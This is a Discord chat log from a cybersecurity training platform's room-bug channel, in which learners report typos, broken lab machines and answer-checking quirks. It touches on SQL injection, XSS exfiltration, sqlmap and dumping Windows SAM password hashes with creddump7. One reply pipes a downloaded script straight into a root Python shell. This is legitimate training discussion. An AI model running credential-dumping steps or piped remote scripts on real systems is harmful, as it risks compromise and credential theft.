PROBLEM: "Challenge can be bypassed by sending the same JWT token that you are supposed to manipulate!"
PROOF: "copy the JWT provided, and paste into the box"

iron reef
#

In "MAL: Researching" the image for hash collisions is the same as the image above

#

@dusky junco

lucid oasis
#

Let me test if its working

#

I disabled it, the problem is the password its using.

obsidian kiln
#

@wheat fractal fix

wheat fractal
#

Times like this

#

I wish I could just make changes directly

blissful iron
#

Hey I'm currently doing the network service room

#

But sadly I get the error that tun0 doesn't exist, Someone who had the same bug ?

obsidian kiln
obsidian kiln
blissful iron
#

@obsidian kiln I'm using the built in vm

obsidian kiln
#

Ah, then you don't have a tun0

#

Swap it for eth0 in whatever command the room is telling you to use

#

What's the task/question number?

blissful iron
#

Task 7 of the Network services room

obsidian kiln
#

I'll add a note in there after a shower

dusky junco
#

Thanks @iron reef I have added that to my list πŸ‘

obsidian hawk
obsidian kiln
#

@obsidian hawk Linux Fundaments 1

slate parrot
#

@dusky junco In your MAL Intro course, in Task 2, feel paragraph 2 (including targeted sectors) is actually more consistent with a targeted attack, rather than a mass attack. Mass campaigns are rarely classed as APT either.

slate parrot
#

Also, in Task 3, β€œMaintaining Persistence” and β€œPersistence” should be combined.

obsidian hawk
teal barn
#

https://tryhackme.com/room/adventofcyber2 - Day 20
I wasn't able to log in SSH with ssh -l mceager 10.10.222.113 or ssh mceager@10.10.222.113 + r0ckStar!
I terminated and deployed back the machine, the ssh service was available only after 5mins (literally) and had to wait 60 sec for password validation.
This task's machine seems to have performance issues.

civic brook
#

Day 20 is a windows host so it may take more than the 2 minute timer to load the box complete (up to 5 minutes sometimes), as far as box slowness not to sure there

void sleet
#

Γ­s it normal that Lazy admin is a deafault apache2 page?

obsidian kiln
#

Yes

formal grail
#

For the Lian_Yu room the first actual question asks about a directory that doesnt exist, i checked write ups and found the directory its meant to be and it answered the question ||its 2100|| but the actual box itself doesnt have a ||2100|| file
I restarted the box as well

stiff notch
#

Anyone knows if this is a bug? It's task 25 and day 20

#

21 now :(

dusky junco
sick badger
#

Hello i have a problem for the box https://tryhackme.com/room/ra.
I have credentials for the smb and they worked but now no, i have reset the box a many time you have a idea ?

TryHackMe
TryHackMe | undefined

An online platform for learning and teaching cyber security, all through your browser.

obsidian kiln
#

@sick badger the SMB can't be accessed unless you create credentials first. i.e. you need to login as the other user again, change the password, then login with SMB

#

When the box terminates that's it gone. There is no persistence. It resets when it dies.

sick badger
#

i create credentials with the website

topaz mauve
#

Are CC Radare2 room points in line with other rooms and their difficulty?

hazy tiger
#

Not a room bug but all rooms follow the same points system, difficulty does not affect the amount of points you receive for each room.

topaz mauve
#

I see, thanks. It just seemed a bit weird that you get ~2k points for one of the rooms πŸ™‚

wraith ledge
eternal summit
wraith ledge
#

I can repaste. New here and not sure

left oak
#

Am thinking there is a bug in the overhauled RP Nessus room. The first question in task 5 does not take the right id,

tiny ginkgo
#

AOC 2020, DAY 20: In the example provided above, The path is provided of a Directory where the Select-String command operates on a file. A wildcard like this \desktop\* can be provided instead in the path to search for the given pattern in all the files present in the Directory.

πŸ“Ž Screenshot_from_2020-12-22_22-51-15.png
silk hatch
#

The new Nessus room is not giving any points, is this intended behavior?

left oak
#

@silk hatch You did manage to fill in the first answer in task 5? Mind if I dm you?

silk hatch
eternal summit
#

@silk hatch that rule doesn't apply to walkthrough rooms, fwiw

silk hatch
left oak
#

thanks to @silk hatch I found the answer that is accepted.. But IMHO it is not the correct answer because this plugin is not used by default and in the task.

#

and the hint is certainly wrong for the accepted answer

silk hatch
#

I did ran into the same problem

void sleet
#

In Bounty hacker when i access the ftp and do commands as "ls" or "get" it doesnt run and some time forward it gives me a error

πŸ“Ž unknown.png
#

Already restarted the machine and still nothing

left oak
#

not a room bug I think. Did you consider what the ftp client tells you?

wheat fractal
#

the scylla.sh doesnt work, Not directly a room bug, but worth mentioning

crimson ore
#

Nmap room task 3, last question. I've answered '--script vuln' and confirmed is the expected answer by checking with writeups but it won't accept it.

north gyro
#

Hi, I'm doing room "Content security policy", in task 7 "attack 5" its required that we abuse a JSONP endpoint to achieve XSS.
the CSP header has script-src 'unsafe-eval' *.google.com now i have crafted a payload that works on myself, however it doesn't work on the bot that checks the site, my suspicion is that the remote machine doesn't have access to *.google.com and therefore my payload doesn't work.

I have confirmed, in my best effort that this machine doesn't have the necessary access to the internet, by trying to exfil to beeceptor

I believe this is a bug in the room. thanks, and yes i have checked the writeup!

obsidian kiln
#

@crimson ore you mean the writeups that are not accepted on the room and thus aren't condoned (for a reason)?

#

There's more than one way to specify that option. Look at the spaces in the answer field. Yes that is a correct answer, but it's not the one the room is looking for, and we don't have the option for multiple answers.

north gyro
#

@crimson ore the answer is actually pretty much given in the text of task 11 go forward and read it, lol fixed it

glacial aspen
#

if it's not can you redirect me to the good topic for it ? apreciate πŸ˜‰

wheat fractal
#

it's the wrong anwser

glacial aspen
#

okay thanks !

#

i tried for ages on that lol

#

like you said i was looking at the wrong place thanks

crimson ore
eternal summit
wheat fractal
#

"Note that the arguments are separated the commas, and connected to the corresponding script with period" ***** should replace "the" with "by" ---Inside Task 11

abstract timber
#

hey ! is anyone having troubles with the pickle rick web room ? website doesent show up but I can see it's source code

stoic hearth
#

Hi guys
I am doing the complete beginner path and on the Nmap room, task 3, last question (https://tryhackme.com/room/furthernmap), i have a wrong answer with a nmap switch I am 99.99% confident of it : --script vuln

drowsy stump
hazy tiger
#

how many characters are in the answer @stoic hearth

stoic hearth
#

13

hazy tiger
hazy tiger
#

12*

stoic hearth
#

i am sorry but i count 13 πŸ™‚

wheat fractal
#

-NMAP
-https://tryhackme.com/room/furthernmap
-Task 11
-There is a typo in the sentence "Note that the arguments are separated the commas, and connected to the corresponding script with period" --- suggest replacing the word "the" with "by" in my opinion πŸ™‚

eternal summit
#

I don't think so

drowsy stump
#

I would write "Note that the arguments are separated by commas, and connected to the corresponding script with period"

eternal summit
#

Ok "the" was used several times and you didn't state which

hazy tiger
wheat fractal
#

That "the"

drowsy stump
#

i wrote the correct sentence

hazy tiger
#

There are 13 asterix here, no spaces, which means the answer doesn't have a space.

πŸ“Ž unknown.png
eternal summit
hazy tiger
wheat fractal
#

^^^

#

Jabba got it

#

That's the "the" I'm talking about

stoic hearth
wheat fractal
#

either the word separated needs to be replaced or the word "the" it just doesn't make sense the way it's worded like that

#

anyway, back to my studies ....

teal barn
eternal summit
#

Aoc2 day 11

dusky junco
#

howdy

eternal summit
#

It's uh

#

Got a number

#

For some reason

dusky junco
#

That's peculiar

eternal summit
#

Especially how it renders.

#

Oooh, want an extra spicy bit of detail?

#

Pinged in the dev chat for it

dusky junco
#

How about now?

#

I know exactly what caused that

eternal summit
dusky junco
#

Ayyeeee wicked. Thanks @eternal summit

eternal summit
#

got another one in the devchat

teal barn
#

1GB RAM, 1 virtual thread of CPU, no graphic acceleration
Windows 10 can't run with that πŸ˜„

dusky junco
#

Thanks Noraj, unfortunately that's AWS -- it's very expensive. Is this straight after you login?

#

As well as for Day 21?

teal barn
#

20 min after boot

dusky junco
#

Interesting

teal barn
#

was 8min after boot for 21

dusky junco
#

Could you show the process that's causing the 100% usage please?

teal barn
#

too late

#

I noticed there was a windows update notification

#

all CPU is used by "System interrupts"

#

also just opening the windows menu make you rise from 5% to 100% CPU instantly

#

coz there is no graphic acceleration

#

so all rendering is done via the CPU

#

you should ask the authors of windows VM to setup the performance mode

dusky junco
#

Perfect yup (: This is something I've discovered over the last week and am trying to find the time to help automate to help windows box users with this

#

Apppreciate you reporting this @teal barn

weary patio
#

Hi all, do I post here a small bug for the calendar event?

teal barn
#

by the way it is not enought as the resources are VERY low all optiosn are nearly all disabled

#

so perf mode only disable the fonts

#

but on a normal destop or laptop all the options are checked

dusky junco
#

Are you connecting via Windows by any chance Noraj?

teal barn
#

it means it will be useless to switch to perf mode

teal barn
dusky junco
#

Yes (: MS' RDP client

teal barn
#

no via remmina

#

as showed in the room material

#

I have even dropped the color depth from 32 bpp to the minimum of 8 bpp

dusky junco
#

Okay, I appreciate you reporting that back to me/us @teal barn

#

I really do

teal barn
#

sure np

dusky junco
#

I'm actively working on improving performance with windows boxes

teal barn
#

no feedback = no issue fixed, so I do my part

dusky junco
#

However, they are unfortunately super expensive to run in the cloud -- hence the low resources (even as a subscriber)

dusky junco
wheat fractal
#

hey guys when doing the internal room on tryhackme ii found ||the wordpress login page|| but when i try to || login with credentials it takes me to http://internal.thm/blog/wp-login.php|| which is not the machine im working with nor do i think it should be that link also the css of the site doesnt load

eternal summit
#

You need to add it to /etc/hosts

#

This is not a bug

#

This is user error

wheat fractal
#

oh sorry then my bad
what do i need to add to the hosts file?

eternal summit
#

That sounds like a research question. This is the channel for reporting room bugs, not a help channel.

wheat fractal
#

nvm

fresh basin
#

anyone else having the Windows RDP session run slower than a snail with asthma?

twin tapir
#

1.) you can scroll up like 1 message and see a conversation about it
2.) its being investigated
3.) windows I dont even know its just windows being windows

strong kelp
chilly igloo
#

Id like to report a bug in this room: https://tryhackme.com/room/linuxctf
Specifically flag 14. The filename has a typo. It's i'm assuming supposed to be flagfourteen.txt but it is actually flagtourteen.txt. Nothing major, but i did want to report this issue for those who might come across this same bug.

prisma venture
twin tapir
#

@prisma venture fixed

prisma venture
#

great room!

chilly igloo
#

Link: https://tryhackme.com/room/furthernmap
Task: 9
Question:
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)
Answer: ||nmap -sn 172.16.0.0/16||
Accepted Answer Provided By Me: ||nmap -sn 172.16.0.0/||

So, it completely disregarded the /16 part of the question. Not sure if that intentional or not as it gave this /16 in the hint, but yea, figured you want to know.

obsidian kiln
#

@chilly igloo that's just answer tolerance on the site. We can't turn it off on a per question basis

chilly igloo
#

@obsidian kiln kk, i figured it was a little give there, but yea. I didn't know if it was intended or not, seeing how i'm a new user. πŸ˜› Just wanted to make sure. Thanks for the reply! πŸ˜„

obsidian kiln
#

Np! Welcome πŸ™‚

oblique hemlock
#

Link: https://tryhackme.com/room/furthernmap
Task: 3
Question:
How would you tell nmap to scan ports 1000-1500?
Answer: ||-p 1000-1500||
Accepted Answer Provided By Me: ||-p 1000-15000 (15k instead of 1.5k)||

hazy tiger
#

It’s answer tolerance

#

If you refresh your page it will update

#

It’s so that answers do not have to be perfect to be accepted

#

@oblique hemlock

#

It’s regex, it can be disabled but it would make certain things like flag entry much harder and more strict

#

Always triple check the information you’re getting from boxes

#

While commands are easy to change, accidentally mistyping someone’s password isn’t that easy to fix..

tight relic
#

Some of the images are broken in the JVM Reverse Engineering room

somber charm
#

Anyone having problem with the Alfred room, it says the root flag should be in C:\Windows\System32\config, but it's not there. I tried searching for it in the entire C:\ and it's just not there.

tawny tree
#

Advent of Cyber 2 windows VMs defaulting to Hindi instead of English

pine kernel
#

Hi, I just have completed advent of cyber 2 and i downloaded my certificate after completing but in the certificate it is showing my username which is hawkxfx but instead of that i want to showcase my full name cause i have to show it on my school...

timber bone
errant plover
#

Hello I found something which i dont know if reported . In Network Services 2 room while exploiting SQL , it says metasploit by default will test with "select module()" command , but actually it tests with "select version()" command

πŸ“Ž unknown.png
forest plover
#

Hey people, I have problems to find all ports in the Brainstorm-Room.

vale ferry
#

I already room in 22 rooms and completed 22 rooms. But still show me on profile Room Completed 21 .why ?

topaz thorn
#

Go through them some rooms may have updated with new questions

forest plover
topaz thorn
#

Not a bug, you need to drop the filter.js otherwise it won't let you upload

faint ridge
#

^^

signal sleet
#

ok thank you

wheat fractal
#

i want to report one question in the OSI topic 2nd question, it says packets in data link layer, isnt it frames instead of the "packets". i know that packets in the network layer.

#

So if its already not wrong,can anyone help me with that?

plucky nimbus
#

I've found what I believe is a mistake in one of the THM rooms.

eternal summit
#

@plucky nimbus Nope, it's not 60. That's hex. This isn't an error with the room

#

Not sixty, that might be a more accurate way of putting it

plucky nimbus
#

Can I have a nudge in the right direction?

eternal summit
plucky nimbus
#

I saw your hint, thanks

frail flare
#

Excuse me. This is the owasp top 10 task 20. I added script in the comments but why there is nothing? It should be something to click...I suppose

πŸ“Ž unknown.png
rugged yew
#

maybe its not even out yet

#

but on the description it just says "An introduction to Windows Event Logs and the tools to query them."

terse halo
#

Room: Metasploit, Task 7. I tried several times until I found an answer --> run autoroute -h showed we can either use CIDR notation or subnet mask with tack -n and -s respectively. So run autoroute -n IP_ADDRESS -s SUBNET_MASK or run autoroute -n IP_ADDRESS/8(etc) should be used. I tried running the submitted command but was not valid.

πŸ“Ž Metasploit.png
eternal summit
#

@terse halo Refresh?

terse halo
prime helm
twin tapir
#

@dusky junco

dusky junco
#

Lmao oops! Sorted (: thanks @prime helm @twin tapir

faint ridge
prime helm
eternal summit
#

@prime helm That's @obsidian kiln's room rather than one from Dark

prime helm
#

sry ^^'

obsidian kiln
#

Oh, danke -- I'll fix that now πŸ‘

manic shoal
#

room agent sudo wont accept CVE, i also used the one i saw in the writeup still doesnt work?

#

CVE i used : CVE-2019-14287

eternal summit
manic shoal
#

oh im sorry, i thought this channel was more suitable

eternal summit
#

That's the correct answer and it will work in the form @manic shoal

#

If it does not, that's a site bug and not a room bug.

#

I have the correct answer RN

manic shoal
#

well it doesnt wont to accept for me i thought its a room bug, sorry :/

eternal summit
#

@manic shoal Check your dev console to see if there's any errors there

#

And try reloading the page

#

It might just be cloudflare being a pain

manic shoal
#

after couple of retries it works

#

thank you for the help

eternal summit
#

Prolly cloudflare being a pain

lime vapor
#

Not quite a bug, but more of a suggestion:

Several people have run into an issue with the NMap Room, under the NMap switches section, specifically the question "How would you activate all of the scripts in the "vuln" category?". The answer is correct, however, in quite a few places online (found when Googling), the same switch has a space, and in some places, it does not. This could confuse some users on which answer to put. My suggestion was to add a hint that informed them to enter the answer without spaces. I think that this might clear it up for some people.

Thank you!

obsidian kiln
lime vapor
#

@obsidian kiln - thank you! I think sometimes we miss the obvious :)

north gyro
north gyro
obsidian kiln
#

@north gyro they already are. Somewhat ironically, this is one of the few cases where the regex doesn't make it accept a technically incorrect answer.

north gyro
north gyro
#

"Based on the output"

plucky nimbus
#

Right, I should probably include the output. Let me edit.

#

Output added

north gyro
#

ok so look in the line MATCHES:

plucky nimbus
#

I... should just go climb into a hole. I thought that was Strl, as L like lima.

north gyro
#

all done?

plucky nimbus
#

Yep.

north gyro
#

πŸ‘

dusky junco
#

Hey if anyone experiences Windows boxes terminating/shutting down after an hour (even though the timer says 2 hours or you've extended it), please @ me with the room code / URL

dusky junco
tiny knot
#

Linux Strength Training, Task 5

'encoded.txt' is not on the deployed machine. Unable to complete the task without it.

latent vessel
tiny knot
#

Then where is the file? Did they changed the name and forgot to update the question?

latent vessel
#

Nope

#

Come in room-hints

terse halo
#

Room: Hydra---> login keyword is missing in between "/" and ":". Not a bug, more of a correction πŸ™‚

πŸ“Ž hydra.png
eternal summit
#

Or a correction

#

If you're sending the data to / then it's perfectly correct

#

It's an example. Not for a specific webapp

terse halo
#

Oh okay gotcha

oblique hemlock
#

After how many minutes can i conclude that the machine is not booting up? On the page it says "it may take up to 3 minutes to boot", and it has been 10mins already and nothing has happened. it is the /room/hydra machine

eternal summit
slate parrot
#

I am completing the CC:Penetration Testing room, and am on Task 18. Although I have been able to enumerate the DB and tables, it seems that the table containing the flag is empty. I have re-deployed the instance twice, but the tests table is empty. Is this a machine bug?

πŸ“Ž Screenshot_2020-12-28_at_14.07.56.png
hazy tiger
#

This isn’t a Machine bug

#

It’s a bug with your SQLMAP

#

Install it from the repo on GitHub and try running it with python sqlmap.py, not sure why this happens but it’s a bit of a pain

#

*would like to add this fix doesn’t always work, you may need to play around with it

slate parrot
slate parrot
slate parrot
slate parrot
#

I think they’re investigating issues with Windows boxes stopping abruptly at the moment. @dusky junco

tulip basalt
viral cobalt
#

HTTP is technically a protcol,

#

and its likely answer tolerance @Sin

#

refresh and it'll be fixed

#

the question should definitely be "what software is the server running"

eternal summit
tulip basalt
#

Oh, I've never noticed that was a thing before, okay sorry to bother!

viral cobalt
#

99% of "oh it accepted the wrong answer" is answer tolerance

zinc cradle
#

it says this is wrong in the linux enumeration room but im sure it is. Am i right or am i being a bit daft here its the same on GTFObins

πŸ“Ž SPOILER_Capture.PNG
eternal summit
#

Those quotes don't look correct

#

"

#

There's a normal double quote for you

zinc cradle
#

me?

eternal summit
#

Who else?

zinc cradle
#

mad ghost

#

anyway

#

idk coz its the same everywhere else i google

eternal summit
#

They just don't look like normal single and double quotes

#

" '

#

There you are

zinc cradle
#

and the change in quotes would be '' for the script its executing and the "" for specifying inside the script what the shell should be

#

they are

tulip basalt
#

this probably isn't a bug? I'm redoing this linux thing, I did it before when it was all 1 room with a bonus at the end, the 2nd paragraph is already completed upon beginning this ?

πŸ“Ž unknown.png
eternal summit
zinc cradle
#

ah i refreshed a few times and it accepted the answer

#

really really weird

dusky junco
trail bramble
#

room:Intro to Windows(intro2win)
Task7

Policies > Windows Settings > Security Settings > Users Right Assignment
should be written below
Policies > Windows Settings > Security Settings > Local Policies > Users Right Assignment

πŸ“Ž Screen_Shot_2020-12-29_at_3.40.19.png
dusky junco
#

You're right -- thanks @trail bramble could you also do me a huuuuuge favour and check to see if the license is expired for that please? Should say on the desktop / computer properties

#

Saves me booting it up to take a look if you wouldn't mind πŸ˜„

#

But I'll resolve the above now ^

#

Saves me booting it up to take a look if you wouldn't mind πŸ˜„
Actually don't worry about this (:

trail bramble
#

Thanks for quick fixing.✨

dusky junco
#

Also gonna look into getting that to boot with more resources because owch

#

That's the one! ^ Thanks so much

trail bramble
#

Not at all.πŸŽ„

dusky junco
#

It could defo do with more RAM

static gull
#

Having a weird problem in the Skynet room:

#

the credentials should work, I even checked with the writeup

twin tapir
#

@dusky junco is this whole thing because we’re using evaluation ISOs and not legit ISOs?

#

I’ve noticed the ones that aren’t evaluations haven’t really had problems

dusky junco
#

Yeah that's my understanding @twin tapir

#

We rely on BYOL atm

twin tapir
#

It’s hard to get real ISOs without other things

dusky junco
#

I'm pretty sure I've butchered the explanation of why it doesn't work but yea at least that's somewhat a part of the fix for it that I gotta do

#

I think the import process breaks it to some extent too

#

So when you've had stuff spun up on AWS that's why it's peachy

oblique hemlock
#

are room typos welcome in this channel?

eternal summit
#

Yes

#

Room, task, question?

#

@dusky junco πŸ‘€ typo plz

dusky junco
#

Dispatched

#

resolved πŸ‘

steel monolith
#

Searchlight - IMINT
Last flag is broken

#

i was sure i was right so i went on one of the writeups linked and copy and pasted the flag and it didnt work lol might be just me or it might be broken

glad badger
#

/room/dockerrodeo Task 4 typo: "Before we being exploiting a Docker Registry" change to "Before we begin exploiting a Docker Registry" @dusky junco

dusky junco
#

thanks @glad badger

chilly kelp
wheat fractal
#

Β΄The Hacking with Powershell room has all the files used for the challenges listed under recent files. which makes it easy not to use powershell. not sure if its really a bug but more of a touchup

twin tapir
#

You’re only going to be hurting yourself

south star
#

Potential bug(s) in Linux: Local Enumeration (https://tryhackme.com/room/lle). Anytime you lose the shell you cannot regain the shell without terminating and relaunching the machine. Additionally, task 6, on the first question, the hinted command(||find -type f -name β€œ*.bak” 2>/dev/null||) does not yield results. I verified on walkthroughs this was the command others used to find the file.

bitter onyx
eternal summit
#

@bitter onyx it's not meant to

#

The instructions need to be modified

#

But corp is due a revamp IIRC anyway

#

In the meantime, host the file on a webserver on your machine

twin tapir
#

that room has a few problems with it the creator is no longer active here iirc

eternal summit
#

I think CMN is revamping it

bitter onyx
velvet linden
eternal summit
#

Refresh the page

#

That's answer tolerance

velvet linden
eternal summit
#

That's the name of one executable that is part of the service

thorn kindle
#

Windows Privesc's room - Task 9...The command given in the task was supposed to display the username and passwd, but it only show the username. I tried to ask around and no one seems to know why there isn't a passwd in the output.

πŸ“Ž unknown.png
eternal summit
lean jungle
#

In task 11 of Windows PrivEsc v1.0 room, I am supposed to install python-crypto via 'apt install', but it seems the repo does not exist. Is there any work around for this?

north gyro
north gyro
lean jungle
# north gyro use python3 `sudo apt install python3-crypto` python 2.7 is depreciated

Thanks for your help. I could install the python3-crypto. The next problem is that I think the script is written for python2.

└─$ python3 creddump7/pwdump.py SYSTEM SAM
  File "creddump7/pwdump.py", line 28
    print "usage: %s <system hive> <SAM hive>" % sys.argv[0]
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("usage: %s <system hive> <SAM hive>" % sys.argv[0])?
thorn kindle
lean jungle
thorn kindle
north gyro
#

@lean jungle there is a program called 2to3 or something similar on Kali, which will produce a patch file, you could try that, or install pip for python2 and use that to install crypto

rustic geyser
#

Hello again peeps πŸ˜„
And i have another issue in room OWASP Juice Shop Task3 after login using SQL injection (direct typing in the field and via burp intercept) no flag is displayed :(.
I did logout and login, close and reopen browser without success 😐
Attached is a screen-cap to confirm that logon was successful.
I know i can google the answer/flag but that is not a fix.

Any suggestions/help ?
Thanks!

L.E. Restarting attack vm and target for another go 😐
L.L.E After restart and retry the flag appeared.

πŸ“Ž unknown.png
robust niche
eternal summit
#

@robust niche It's either

#

Not a bug

robust niche
#

Since the other may fail, the other may not, id say its a bug

eternal summit
#

What.

robust niche
#

But its a minor thing, whatever πŸ™‚

eternal summit
#

They're literally the same except one doesn't do reverse DNS.

robust niche
#

-lvp might result in "nc: getnameinfo: Temporary failure in name resolution"

eternal summit
#

Ok. That's not a problem.

robust niche
#

Ok ok πŸ™‚

lean jungle
lean jungle
#

I hope someone can tell me about alternative tools...sadcooctus

obsidian kiln
#

You know they exist now, so go hunting πŸ™‚

lean jungle
lean jungle
#

Nop. It seemed it was working, but I've got 'incorrect'.

undone basin
#

Hi all, complete noob thing - https://tryhackme.com/room/linux2 Task 6 "What is the value of the home environment variable" imho should be "What is the value of the HOME environment variable"

TryHackMe
TryHackMe | Linux Fundamentals Part 2

Further adapt your Linux skills by understanding operators. Get hands-on and remotely access your own Linux machine to put your knowledge into use!

trail merlin
#

Hello - In the wireshark room there is an issue with Task 7 - ARP traffic. The question asks to find the IP address for a specific MAC address (80:fb:06:f0:45:d7) in the capture file provided but the answer format doesn't match up to any IP's so no answer is correct.

timber bone
#

In day 16 of aoc, someone was having problems in that task and i just went to check it out and the web server in it is running on port 80, but it was supposed to run on port 8000

glad badger
#

@dusky junco ^^^

grim fossil
#

In room OWASPtop10 Task 25 question 2: I was able to get the admin flag at the admin dashboard without changing the userType cookie from "user" to "admin" - i assume, it's not meant to be like that?

trail merlin
eternal summit
#

@trail merlin Are there not multiple IPs shown in the ARP table?

#

Also if that's a /8 like it should be, the host part isn't just the last octet.

trail merlin
timid crane
#

In the Windows PrivEsc room task 9 I'm assuming we're looking for a registry entry named "DefaultPassword", unfortunately this entry does not seem to be there

thorn kindle
timid crane
#

it's just annoying that you can't 100% the room without that password

thorn kindle
timid crane
#

but you can probably guess the password @thorn kindle

thorn kindle
timid crane
#

it's used for other tasks

thorn kindle
robust niche
lean jungle
north gyro
#

@lean jungle of course, its solvable,

curl https://bootstrap.pypa.io/get-pip.py | sudo python -

to install pip, then

sudo pip install crypto

to install crypto extensions, follow the rest of the instructions as is.
or you could just use mimikatz which will do the same job, but runs in windows

velvet flare
#

Something buggy in one of the tasks in the OWASP Top 10 room. Task 29, the components with known vulnerabilities lab. Once the machine is deployed and I've navigated to the web app, everything works fine on initial load. But if I go anywhere on the site, the database breaks, and I get the error "Can't connect database No such file or directory". This also keeps the intended exploit from running and providing a shell. Redeploying is the only way I can find to fix the database. I've successfully completed the task, just wanted to pass the bug along.

lean jungle
north gyro
#

@lean jungle good job, there is always a solutionβ„’

woeful hawk
#

A very small typo, but on the https://tryhackme.com/room/lle task 3 it says: " Copy the content of the id_rsa.pub file and put it inside the authorized_key file on the target machine (located in .ssh folder). ", while it should say authorized_keys (it correctly uses the plural in the paragraph before, but can cause unnecessary confusion as the file does not exist on the target box from the start

TryHackMe
TryHackMe | Cyber Security Training

An online platform for learning and teaching cyber security, all through your browser.

novel plover
#

For Room: Retro, in PrivEsc portion, there's no option for me to open any browser. Followed the advice of @obsidian kiln based on @heavy spade's reco but still to no avail 😦

#

I've tried to restart the box/instance and still encounter the same issue.

next bluff
#

So you can easily make one yourself there

woeful hawk
silk hatch
#

Is the new Nessus room supposed to give points?

#

This one

obsidian kiln
#

Unlikely

verbal sedge
#

Its a walkthrough room each task that requires an answer will give 8 points.

silk hatch
#

Is this expected behavior of the room?

obsidian kiln
#

Likely if it's a big room, yea

silk hatch
#

Ah, shame, im having an epic battle for the throne, that's why i was concerned about the monthy pointis

πŸ“Ž unknown.png
#

Thanks

verbal sedge
#

@silk hatch iirc walkthrough rooms points are not counted in monthly leaderboard. Only CTF(correct me if i'm wrong @obsidian kiln )

wheat fractal
#

Hello,

#

I have found an error on this room: Introductory Networking

At the** task 6**

At this question: What is the IP address?

Now the ip is an Ipv6 ip :2001:8d8:100f:f000::241
Not this ip: 217.160.0.152

#

you can try yourself do a ping muirlandoracle.co.uk

#

but you can find the good ip with a -4 so idk

eternal summit
#

@obsidian kiln your blog does IPv6 smh

#

Just gotta tell em to use ipv4

obsidian kiln
#

Mhm. I'll add that into the hint

proper surge
#

Hello, I may have found an error in the room "Buffer Overflow Prep" when using it with the AttackBox. Specifically, on Task 2, when I execute the "fuzzer.py" command as instructed, the AttackBox only is able to send 100 bytes before Immunity Debugger on the Target Windows VM terminates the oscp.exe file. However, when I go to execute the following sub-step involving exploit.py, I do not get the "EIP contains normal pattern" message in the log as the task says I should. Furthermore, when I go to look at the official writeups, it looks like those writeup authors are able to get "fuzzer.py" to go up into the thousands before oscp.exe is terminated on the Target Windows VM. Since the room's deployment, has an unexpected safeguard been deployed on either the Target Windows VM, or the Attackbox -> VM Network Infrastructure to kill a BOF fuzzing attempt?

eternal summit
#

No

proper surge
#

thanks for the prompt reply. I'll take another look at the "fuzzer.py" code to make sure I'm copying and pasting it into the AttackBox correctly.

eternal summit
#

You will need to use python2.7 on the box or similar

proper surge
#

ahh, that may be the issue then, as I was executing it using an older python version I think

eternal summit
#

python on the attackbox is Python3 because it's 202(0/1)

eternal summit
proper surge
#

ok, I'll look further into the python command to make sure the file is executed using the right python version. Thank you!

proper surge
# eternal summit Newer.

I'm confirming that the incorrect python version was the issue. Running with "python2 fuzzer.py" resolved the issue. Given that the task provides very specific commands to be executed (since it's a beginner room), may I recommend that the text be slightly revised to indicate that the python file needs to be run using Python2? Thanks again for the prompt assistance!

eternal summit
#

The convention always was python was 2.7 and python3 was python3.x

#

This has changed because python2.7 is unsupported. A lot of exploits are still written in python2 though. It's a major issue.

proper surge
wheat fractal
oblique hemlock
#

i read somewhere a few days ago that windows boxes were acting funny but now i'm trying to do Pickle Rick CTF and it keeps crashing every minute or so. Is that also with linux boxes or is it just this one.

eternal summit
#

Nope I'd recommend asking for help in the help chats

oblique hemlock
#

but i don't really need help, i just need it to stop crashing πŸ˜„

eternal summit
wheat fractal
#

Having an issue with SimpleCTF - When I do a port scan, I get back 2 ports under 1000, 21, and 80, but the questions are expecting SSH to be listed as the highest port (22) Currently connected at 10.10.197.123

slate parrot
#

In Web Scanning, Task 3, Question "Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack ...", the AttackBox version of ZAP does not provide the expected answer of ||Web Browser XSS Protection Not Enabled|| -- see screenshot. I have re-ran the scan twice, including in ATTACK mode.

πŸ“Ž Screenshot_2021-01-01_at_21.43.23.png
eternal summit
eternal summit
wheat fractal
#

But that is one that is being deployed. I tried it twice.

eternal summit
#

Scan with -p-

oblique hemlock
obsidian kiln
#

@wheat fractal fix 😁

wheat fractal
#

hello! A small bug in room kenobi, Task1 question: the number of expected open ports is single digit, which is correct if you run nmap <ip> -vv , but with nmap -p- <ip> you get 11 open ports, which seems technically more accurate πŸ™‚

wheat fractal
#

another small typo Which is actually a version of /usr/sh -> Which is actually a version of /bin/sh no?

glad plume
#

https://tryhackme.com/room/sqlibasics

Task 6 gives examples of true and false sqli payloads but they both resolve to 'true' and the parameter is not actually susceptible to SQLi according to 'Damn Small SQLi Scanner'

Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.3b
 by: Miroslav Stampar (@stamparm)

* scanning GET parameter 'id'

scan results: no vulnerabilities found```
TryHackMe
TryHackMe | Cyber Security Training

An online platform for learning and teaching cyber security, all through your browser.

glad plume
whole prairie
# north gyro <@!414311709142941697> of course, its solvable, ``` curl https://bootstrap.pypa...

Hi @north gyro , I have the same (i think) issue as @lean jungle at task11 of Windows PrivEsc room: The

sudo apt install python-crypto

command returns that

E: Unable to locate package python-crypto

So, I tried to install crypto pack instead as you suggested with pip:

sudo pip install crypto

Witch is installed, but still it's not working the final command:
python2 creddump7/pwdump.py SYSTEM SAM returns:

ImportError: No module named Crypto.Hash

#

Any ideas?

lean jungle
eternal summit
whole prairie
whole prairie
whole prairie
lean jungle
# whole prairie So <@!414311709142941697> how did you installed pycrypto? After <@!3982970840943...

Yes. I think I have encountered that. Sorry, I don't remember how I fixed it. So, I tried the same with a new Kali in-browser box now and it worked.
